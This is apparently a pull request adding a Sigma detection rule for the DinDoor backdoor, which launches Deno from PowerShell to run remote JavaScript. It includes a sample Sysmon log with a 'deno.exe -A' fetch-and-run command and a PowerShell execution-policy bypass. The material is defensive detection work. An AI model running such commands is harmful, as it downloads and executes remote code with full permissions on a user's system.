new: Dindoor Backdoor Malware rule

[marcopedrinazzi]

Summary of the Pull Request

Detects Deno launched from PowerShell with full permissions to execute remote JavaScript as observed in DinDoor MSI installer chains.

Changelog

new: DinDoor Backdoor Deno Remote JavaScript Execution From PowerShell

Example Log Event

Process Create:
RuleName: -
UtcTime: 2026-06-25 13:33:39.995
ProcessGuid: {34E9093F-2E33-6A3D-F901-000000000D00}
ProcessId: 5488
Image: C:\Users\marco\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe
FileVersion: 2.8.3
Description: Deno: A secure runtime for JavaScript and TypeScript
Product: Deno
Company: -
OriginalFileName: deno.exe
CommandLine: "C:\Users\marco\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" -A http://example.com/name.js
CurrentDirectory: C:\Users\marco\Desktop\
User: DESKTOP-54JCEU5\marco
LogonGuid: {34E9093F-2978-6A3D-7BDE-010000000000}
LogonId: 0x1de7b
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=71F9647A3BE871E09ADA71049AE754F4,SHA256=C5DB43554211B07181BF92702789466D3403E450CFFC09E123583F1C315063EC,IMPHASH=FAC3C17E0DD2299652A9A1769F310005
ParentProcessGuid: {34E9093F-2E19-6A3D-F601-000000000D00}
ParentProcessId: 9524
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe  -NoProfile -ExecutionPolicy Bypass .\powershell.ps1
ParentUser: DESKTOP-54JCEU5\marco

Fixed Issues

SigmaHQ Rule Creation Conventions

• If your PR adds new rules, please consider following and applying these conventions

[marcopedrinazzi]

deno.zip evtx for regression testing